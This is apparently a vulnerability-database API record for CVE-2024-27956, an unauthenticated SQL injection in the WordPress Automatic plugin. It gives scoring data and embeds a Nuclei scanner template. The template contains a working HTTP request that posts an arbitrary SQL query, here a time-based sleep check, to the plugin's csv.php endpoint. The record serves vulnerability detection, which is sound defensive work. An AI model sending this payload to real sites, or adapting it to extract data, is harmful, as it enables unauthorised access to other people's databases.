{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2024-27956/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2024-27956/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2024-27956/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2024-27956/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2024-27956/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2024-27956"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2024-27956"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.94057,
      "kev": false,
      "percentile": 0.99844
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2024/CVE-2024-27956.yaml",
      "nuclei_template_severity": "critical",
      "nuclei_template_yaml": "id: CVE-2024-27956\n\ninfo:\n  name: WordPress Automatic Plugin <= 3.92.0 - SQL Injection\n  author: DhiyaneshDK\n  severity: critical\n  description: |\n    The Automatic plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.92.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n  impact: |\n    Unauthenticated attackers can execute arbitrary SQL queries on the database, potentially extracting sensitive information or modifying data.\n  remediation: |\n    Update WordPress Automatic plugin to version 3.92.1 or later.\n  reference:\n    - https://github.com/truonghuuphuc/CVE-2024-27956\n    - https://patchstack.com/database/vulnerability/wp-automatic/wordpress-automatic-plugin-3-92-0-unauthenticated-arbitrary-sql-execution-vulnerability?_s_id=cve\n    - https://github.com/NaInSec/CVE-LIST\n    - https://github.com/nomi-sec/PoC-in-GitHub\n    - https://nvd.nist.gov/vuln/detail/CVE-2024-27956\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:L\n    cvss-score: 9.9\n    cve-id: CVE-2024-27956\n    cwe-id: CWE-89\n    epss-score: 0.94057\n    epss-percentile: 0.99843\n  metadata:\n    verified: true\n    max-request: 1\n    publicwww-query: \"wp-content/plugins/wp-automatic\"\n  tags: time-based-sqli,cve,cve2024,sqli,wordpress,wpscan,wp-automatic,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 20s\n        POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        q=SELECT IF(1=1,sleep(5),sleep(0));&auth=%00&integ=dc9b923a00f0e449c3b401fb0d7e2fae\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=5'\n          - 'status_code == 200'\n          - 'contains(header, \"application/csv\")'\n          - 'contains_all(body, \"DATE\", \"ACTION\", \"KEYWORD\")'\n        condition: and\n# digest: 4a0a00473045022100a2937249d4c0de9e946d0313e22fc7d1725c457a10af59cead6f068765b475b6022072c6f191b788e78cfea9b338c366e186b431c0f8a2f54094a89a3188146698cb:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2024-27956"
}